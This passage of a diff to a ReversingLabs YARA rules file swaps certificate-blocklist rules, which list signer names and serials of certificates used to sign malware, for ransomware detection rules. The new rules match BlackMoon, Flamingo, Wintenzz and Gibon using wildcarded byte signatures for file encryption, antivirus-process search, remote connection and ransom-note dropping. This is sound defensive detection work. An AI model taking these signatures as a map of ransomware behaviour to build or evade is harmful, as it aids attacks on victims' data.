+            ?? ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? FF 70 ?? FF 70 ?? 53 53 57 FF 15 ?? ?? ?? ?? 57 FF
+            15 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 53 53 0F 57 C0 66 0F 13 45 ?? FF
+            75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 89 5D ?? 56 8D 4D ?? E8 ?? ??
+            ?? ?? 59 59 85 C0 74 ?? 6A ?? 58 88 5D ?? 48 75 ?? 51 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 41
+            8B 45 ?? 89 85 ?? ?? ?? ?? 89 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 8B 8E ?? ?? ?? ?? 83 C1
+            ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 89 5D ?? 53 8D 45 ?? 50 FF B6 ?? ?? ?? ?? FF 75
+            ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 85 C9 0F 84 ?? ?? ?? ?? 3B
+            8E ?? ?? ?? ?? 8B 45 ?? 6A ?? 5A 0F 42 C2 39 5D ?? 8B 55 ?? 0F 45 45 ?? 01 8E ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? 89 45 ?? 11 9E ?? ?? ?? ?? 8B 45 ?? 8B 75 ?? 50 56 89 45 ??
+            E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 53 52 50 57 FF 15 ?? ?? ?? ?? 8B
+            C3 89 5D ?? 83 F8 ?? 7D ?? 53 8D 45 ?? 50 FF 75 ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75
+            ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 40 89 45 ?? EB ?? 8B 75 ?? 33 C0 8B 4D ?? 40 01
+            86 ?? ?? ?? ?? 11 9E ?? ?? ?? ?? EB ?? 33 C0 8D 48 ?? 89 4D ?? 85 C9 0F 84 ?? ?? ??
+            ?? 39 5D ?? 74 ?? 6A ?? 53 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 57 FF 15 ?? ??
+            ?? ?? 53 8D 45 ?? 50 68 ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B D8 E8 ?? ??
+            ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 FF ?? 74 ?? 8B 45 ?? 57 83 08
+            ?? FF 15 ?? ?? ?? ?? 8B C3 5F 5E 5B 8B E5 5D C3
+        }
+		$remote_connection_v5_0_3 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 68 ?? ?? ?? ?? 33 DB 8D 85 ?? ?? ?? ?? 8B F1 53
+            50 89 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B FB 0F B7 04 5E 66 85 C0 74 ?? 83 F8 ?? 75 ??
+            83 C3 ?? 56 89 5D ?? FF 15 ?? ?? ?? ?? 3B D8 73 ?? 8D 14 1B 0F B7 04 32 EB ?? 66 83
+            F8 ?? 74 ?? 43 0F B7 04 5E 66 85 C0 75 ?? EB ?? 8B CB 2B 4D ?? 74 ?? 03 F2 8D BD ??
+            ?? ?? ?? D1 E9 F3 A5 13 C9 66 F3 A5 8B 75 ?? 8D 43 ?? 8D 04 46 50 8D 85 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 33 FF 47 43 85 FF 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ??
+            ?? 8D 7D ?? 6A ?? 59 BE ?? ?? ?? ?? F3 A5 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85
+            FF 74 ?? 51 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 83 EC ?? 57 FF 15 ?? ?? ??
+            ?? 50 57 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B CF 8B
+            F0 E8 ?? ?? ?? ?? EB ?? 33 F6 83 7D ?? ?? 74 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 8B C6
+            5E 5B 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, William Zoltan" and pe.signatures [ i ] . serial == "2f:da:dd:07:40:57:22:70:20:3f:81:38:69:2c:4a:83" and 1404172799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $search_antivirus_processes and $find_files and $crypt_files and $remote_connection ) or ( $find_files_v2 and $crypt_files_v2 and $search_antivirus_processes_v2 and $remote_connection_v2 ) or ( $search_antivirus_processes_v2 and $find_files_v2_1 and $crypt_files_v2_1 and $remote_connection_v2_1 ) or ( $search_antivirus_processes_v4_1_2 and $find_files_v4_1_2 and $crypt_files_v4_1_2 and $remote_connection_v4_1_2 and $url_parameters_setup_v4_1_2 ) or ( $search_antivirus_processes_v4 and $find_files_v4 and $crypt_files_v4 and $url_parameters_setup_v4 ) or ( $search_antivirus_processes_v2 and $find_files_v2_1 and $remote_connection_v2_1 and $crypt_files_v3 ) or ( $search_antivirus_processes_v5 and $find_files_v5 and $crypt_files_v5 and $remote_connection_v5 and $url_parameters_setup_v5 ) or ( $search_antivirus_processes_v5_0_1 and $find_files_v5_0_1 and $crypt_files_v5_0_1 and $url_parameters_setup_v5_0_1 and $remote_connection_v5_0_1 ) or ( $search_antivirus_processes_v5_0_2 and $find_files_v5_0_2 and $crypt_files_v5_0_2 and $set_url_parameters_v5_0_2 and $remote_connection_v5_0_2 ) or ( $search_antivirus_processes_v5_0_2 and $find_files_v5_0_2 and $crypt_files_v5_0_3 and $set_url_parameters_v5_0_3 and $remote_connection_v5_0_3 ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4Fc13D6220C629043A26F81B1Cad72D8 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Blackmoon : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BlackMoon ransomware."
 		author = "ReversingLabs"
-		id = "c2573adc-6580-58aa-a58c-c21bf6b79364"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "95ebb6c4-b0c9-5f9a-8424-a2f4d33953eb"
+		date = "2020-11-11"
+		modified = "2020-11-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1618-L1634"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BlackMoon.yara#L1-L70"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5572c278f6c9be62b2bba09ea610fd170438c6893ee5283ff4a5b3bb2852b07b"
+		logic_hash = "428409096a8637978bf2a1efb3238e4ba87715a909693b0cd26c0f689d567a09"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BlackMoon"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            81 EC ?? ?? ?? ?? 53 8B 9C 24 ?? ?? ?? ?? 55 56 8B 33 57 8B BC 24 ?? ?? ?? ?? 33 ED
+            85 FF 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 76 ?? 85 F6 74 ?? 83 FE ?? 74 ?? 56 FF
+            15 ?? ?? ?? ?? 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 89 33 74 ?? 8B 84
+            24 ?? ?? ?? ?? 85 C0 74 ?? 8B 4C 24 ?? 83 E1 ?? 80 F9 ?? 74 ?? EB ?? 8B 94 24 ?? ??
+            ?? ?? 8B 44 24 ?? 85 C2 74 ?? BD ?? ?? ?? ?? 85 F6 74 ?? 83 FE ?? 74 ?? 85 ED 75 ??
+            8B 84 24 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 85 C0 8D 44 24 ?? 50 56 74 ?? FF D7 85 C0 74
+            ?? 8B 4C 24 ?? 83 E1 ?? 80 F9 ?? 75 ?? 8D 54 24 ?? 52 56 FF D7 85 C0 75 ?? 5F 5E 5D
+            33 C0 5B 81 C4 ?? ?? ?? ?? C3 FF D7 85 C0 74 ?? 8B 9C 24 ?? ?? ?? ?? 85 5C 24 ?? 75
+            ?? 8D 4C 24 ?? 51 56 FF D7 85 C0 75 ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 8D 54 24 ??
+            52 E8 ?? ?? ?? ?? 40 50 E8 ?? ?? ?? ?? 8B D0 8D 7C 24 ?? 83 C9 ?? 33 C0 83 C4 ?? F2
+            AE F7 D1 2B F9 8B C1 8B F7 8B FA C1 E9 ?? F3 A5 8B C8 8B C2 83 E1 ?? F3 A4 5F 5E 5D
+            5B 81 C4 ?? ?? ?? ?? C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ??
+            6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ??
+            B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? DB
+            45 ?? DD 5D ?? DD 45 ?? DB 45 ?? DD 5D ?? DC 65 ?? DD 5D ?? DD 45 ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 6A ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B
+            5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D
+            ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
+        }
+		$encrypt_files_p2 = {
+            83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89
+            45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ??
+            ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ??
+            8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ??
+            ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A
+            ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ??
+            B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85
+            DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ??
+            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, meicun ge" and pe.signatures [ i ] . serial == "4f:c1:3d:62:20:c6:29:04:3a:26:f8:1b:1c:ad:72:d8" and 1404172799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3457A918C6D3701B2Eaca6A92474A7Cc : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Flamingo : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Flamingo ransomware."
 		author = "ReversingLabs"
-		id = "12526715-7b54-5c31-aa2a-b77ed067e3ee"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "333ef1f9-ac54-5a3d-9b2b-50483eeb93e1"
+		date = "2021-04-14"
+		modified = "2021-04-14"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1636-L1652"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Flamingo.yara#L1-L54"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "70d4bece52a86bfe8958f6d4195b833cea609596e3b68bb90087c262501bd462"
+		logic_hash = "446c0d332af01c0fceb0356d5ab273eb55764869cc8343468b75625e5d4d1036"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Flamingo"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KONSALTING PLUS OOO" and pe.signatures [ i ] . serial == "34:57:a9:18:c6:d3:70:1b:2e:ac:a6:a9:24:74:a7:cc" and 1432252799 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_621Ed8265B0Ad872D9F4B4Ed6D560513 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "b64e640c-264f-597c-90a5-d0ad57aa5075"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1654-L1670"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c133d6eea5d27e597d0a656c7c930a5ca84adb46aa2fec66381b6b5c759e22aa"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ??
+            83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ??
+            ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15
+            ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08
+            C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ??
+            80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85
+            C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F
+            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
+        }
+		$encrypt_files = {
+            68 ?? ?? ?? ?? 83 EC ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B CC C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ??
+            ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 85
+            ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 68 ?? ??
+            ?? ?? 51 6A ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ??
+            C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ??
+            C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 8B BD ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 47 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ??
+            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ??
+            8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fan Li" and pe.signatures [ i ] . serial == "62:1e:d8:26:5b:0a:d8:72:d9:f4:b4:ed:6d:56:05:13" and 1413183357 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_56E22B992B4C7F1Afeac1D63B492Bf54 : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Wintenzz : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Wintenzz ransomware."
 		author = "ReversingLabs"
-		id = "28609e75-47cb-5017-bb92-046a9e8931c6"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "6bf569e8-b050-51ef-a948-0eb294248d63"
+		date = "2021-11-02"
+		modified = "2021-11-02"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1672-L1688"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Wintenzz.yara#L1-L83"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ef058c0ec352260fa3db0fc74331d1da3c9eb8d161cef7635632fd7c569198c6"
+		logic_hash = "ff4bdf2f6ee185b98d0014b3066806fe7e25ea94f46837948bc5262440bf8a56"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Wintenzz"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            48 8D 75 ?? 41 B8 ?? ?? ?? ?? 48 89 F1 31 D2 E8 ?? ?? ?? ?? 48 89 F9 48 89 F2 E8 ??
+            ?? ?? ?? 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 89 C6 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ??
+            ?? ?? 0F 28 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 11 00 0F 28 85 ?? ?? ??
+            ?? 0F 11 40 ?? 48 8B 8D ?? ?? ?? ?? 48 89 48 ?? 49 89 77 ?? 49 89 47 ?? 41 C7 47 ??
+            ?? ?? ?? ?? 49 8D 4F ?? 48 8D 55 ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 B6 ?? 31 C0
+            49 89 07 48 85 DB 75 ?? EB ?? E8 ?? ?? ?? ?? 48 C1 E0 ?? 49 89 47 ?? 49 C7 47 ?? ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 31 F6 49 89 07 48 85 DB 74 ?? 48 01 DB 74 ?? 41 B8 ?? ?? ??
+            ?? 48 89 F9 48 89 DA E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 41 B8 ?? ??
+            ?? ?? 4C 89 F1 E8 ?? ?? ?? ?? 40 84 F6 75 ?? 48 8B 8D ?? ?? ?? ?? 48 85 C9 74 ?? 48
+            8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 F8 48 81 C4
+            ?? ?? ?? ?? 5B 5F 5E 41 5E 41 5F 5D C3 BA
+        }
+		$encrypt_files_p1 = {
+            4C 89 75 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D
+            05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 C7 45 ?? ?? ?? ?? ??
+            48 C7 45 ?? ?? ?? ?? ?? 48 89 7D ?? 48 C7 45 ?? ?? ?? ?? ?? 48 8D 4D ?? 48 8D 55 ??
+            E8 ?? ?? ?? ?? 0F 10 45 ?? 0F 29 45 ?? 48 8B 45 ?? 48 89 45 ?? 48 8D 4D ?? 48 8D 55
+            ?? E8 ?? ?? ?? ?? 48 85 DB 74 ?? BA ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 85 C0 75
+            ?? BA ?? ?? ?? ?? 48 89 D9 E8
+        }
+		$encrypt_files_p2 = {
+            86 97 ?? ?? ?? ?? C0 74 3C ?? ?? C1 E8 ?? 28 03 00 48 ?? C0 74 2F ?? ?? FA 03 75 ??
+            48 8D 0D ?? ?? ?? ?? 48 39 C8 0F 84 ?? ?? ?? ?? 0F B7 08 81 F1 ?? ?? ?? ?? 0F B6 40
+            ?? 83 F0 ?? 66 09 C8 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? ?? 48 85
+            C0 74 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 FA ?? 75 ?? 48 8D 0D ?? ?? ??
+            ?? 48 39 C8 0F 84 ?? ?? ?? ?? 81 38 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8B
+            55 ?? E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 FA
+            ?? 75 ?? 48 8D 0D ?? ?? ?? ?? 48 39 C8 0F 84 ?? ?? ?? ?? 0F B7 08 81 F1 ?? ?? ?? ??
+            0F B6 40 ?? 83 F0 ?? 66 09 C8 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ??
+            ?? 48 85 C0 74 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 FA ?? 75 ?? 48 8D 0D
+            ?? ?? ?? ?? 48 39 C8 0F 84 ?? ?? ?? ?? 0F B7 08 81 F1 ?? ?? ?? ?? 0F B6 40 ?? 83 F0
+            ?? 66 09 C8 0F 84 ?? ?? ?? ?? 48 8B 4D
+        }
+		$drop_ransom_note = {
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 48 8B 8D ?? ??
+            ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 48 8B 8D
+            ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 48
+            8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74
+            ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85
+            D2 74 ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ??
+            48 85 D2 74 ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ??
+            ?? ?? 48 85 D2 74 ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 84 F6
+            0F 85 ?? ?? ?? ?? 48 8B 55 ?? 48 85 D2 74 ?? 41 B8 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8B 55 ?? 48 85 D2 74 ?? 41 B8 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 8B 55
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Hetem Ramadani" and pe.signatures [ i ] . serial == "56:e2:2b:99:2b:4c:7f:1a:fe:ac:1d:63:b4:92:bf:54" and 1435622399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_* ) ) and ( $drop_ransom_note )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3Bc3Bae4118D46F3Fdd9Beeeab749Fee : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Gibon : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Gibon ransomware."
 		author = "ReversingLabs"
-		id = "0d2f1f5f-119a-5069-abcb-e4e93d9964c3"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "3f1a5bee-8fc0-5596-b898-e97073731930"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1690-L1706"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Gibon.yara#L1-L122"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
